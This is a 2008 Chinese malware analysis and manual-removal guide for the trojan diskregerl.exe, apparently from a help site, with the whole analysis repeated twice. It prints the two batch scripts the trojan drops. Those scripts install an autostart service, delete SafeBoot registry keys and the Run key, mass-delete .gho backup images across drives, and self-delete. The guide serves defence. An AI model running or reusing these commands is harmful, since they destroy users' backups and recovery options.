diskregerl.exe(Trojan.Agent.cdt)病毒手動(dòng)查殺
更新時(shí)間:2008年04月16日 23:09:30 作者:
文件名稱:diskregerl.exe
文件大小:45,056 字節(jié)
AV命名:Trojan.Agent.cdt
加殼方式:UPX
編寫語言:VC
文件MD5:e98a4571cf72b798077d12d6c4894629
行為分析:
1、拷貝文件:
C:\windows\system32\diskregerl.exe 45,056 字節(jié)
2、無添加啟動(dòng)項(xiàng)舉動(dòng)。
3、釋放2個(gè)批處理:
內(nèi)容分別為:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 創(chuàng)建網(wǎng)絡(luò)連接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 開始.wav"
del "C:\WINDOWS\Media\Windows XP 信息欄.wav"
del "C:\WINDOWS\Media\Windows XP 彈出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤獨(dú)更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二個(gè):
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、連接網(wǎng)站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外該病毒可能惡意鎖定IE主頁,不過未實(shí)現(xiàn)。
解決方法:
1、重啟計(jì)算機(jī)。
2、刪除文件:
C:\windows\system32\diskregerl.exe
3、如果重啟后病毒無法刪除,請(qǐng)下載冰刃(該軟件可到down.45it.com下載),結(jié)束其進(jìn)程。
行為分析:
1、拷貝文件:
C:\windows\system32\diskregerl.exe 45,056 字節(jié)
2、無添加啟動(dòng)項(xiàng)舉動(dòng)。
3、釋放2個(gè)批處理:
內(nèi)容分別為:
22483
17213
25187
6133
22690
25373
date 2004-08-17
19477
time 20:00:00
ping 127.0.0.1 -n 5
sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot
sc.exe description diskregerl 創(chuàng)建網(wǎng)絡(luò)連接2
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
23413
sc.exe start diskregerl
del "C:\WINDOWS\Media\Windows XP 開始.wav"
del "C:\WINDOWS\Media\Windows XP 信息欄.wav"
del "C:\WINDOWS\Media\Windows XP 彈出窗口已阻止.wav"
regsvr32.exe /s C:\windows\system32\Programnot.dll
ping 127.0.0.1 -n 6
del "C:\Documents and Settings\孤獨(dú)更可靠\桌面\oky.exe" /F
22483
17213
date 2008-04-02
time 08:21:33
del %0
exit
第二個(gè):
25187
6133
226902537319477
2819720092
404
ping 127.0.0.1 -n 16
13539
cmd.exe /c del /f /s /q c:*.gho
6752
cmd.exe /c del /f /s /q d:*.gho
31772
cmd.exe /c del /f /s /q e:*.gho
12028
cmd.exe /c del /f /s /q f:*.gho
8720
cmd.exe /c del /f /s /q g:*.gho
10731
cmd.exe /c del /f /s /q h:*.gho
8840
cmd.exe /c del /f /s /q i:*.gho
11736
regsvr32.exe /s C:\windows\system32\Programnot.dll
del %0
exit
4、連接網(wǎng)站,刷流量:
http://www.xerty.cn/^^/300center.htm
5、另外該病毒可能惡意鎖定IE主頁,不過未實(shí)現(xiàn)。
解決方法:
1、重啟計(jì)算機(jī)。
2、刪除文件:
C:\windows\system32\diskregerl.exe
3、如果重啟后病毒無法刪除,請(qǐng)下載冰刃(該軟件可到down.45it.com下載),結(jié)束其進(jìn)程。

相關(guān)文章
病毒Autorun.inf、pagefile.pif等的解決辦法
病毒Autorun.inf、pagefile.pif等的解決辦法...2007-03-03已證實(shí)Au_.exe是NSIS安裝包的一個(gè)組成部分與說明
已證實(shí)Au_.exe是NSIS安裝包的一個(gè)組成部分與說明...2007-03-03木馬下載器前仆后繼,AOTU病毒群卷土重來(專殺4月15日升級(jí)到1.4版)
磁碟機(jī)病毒在各安全廠商和媒體的一致喊打聲中突然銷聲匿跡,但這僅僅是盜號(hào)集團(tuán)的暫時(shí)退卻,很快,我們發(fā)現(xiàn)又一類利用配置autorun.inf配置自動(dòng)運(yùn)行的木馬下載者蜂涌而至,同樣,這些瘋狂的下載者,可一次性下載20-30個(gè)盜號(hào)木馬,用戶的電腦將面臨又一次蹂躪。2008-05-05用批處理實(shí)現(xiàn)Auto病毒專殺工具的代碼
用批處理實(shí)現(xiàn)Auto病毒專殺工具的代碼...2007-05-05使用仙劍奇?zhèn)b傳四算號(hào)器不小心中了廣告插件的解決辦法
使用仙劍奇?zhèn)b傳四算號(hào)器不小心中了廣告插件的解決辦法...2007-08-08惡劣的U盤病毒W(wǎng)orm.Pabug.ck(OSO.exe)分析與查殺
惡劣的U盤病毒W(wǎng)orm.Pabug.ck(OSO.exe)分析與查殺...2007-02-02完美修復(fù)SVCHOST.EXE出現(xiàn)0x745f2780錯(cuò)誤的方法
完美修復(fù)SVCHOST.EXE出現(xiàn)0x745f2780錯(cuò)誤的方法...2007-03-03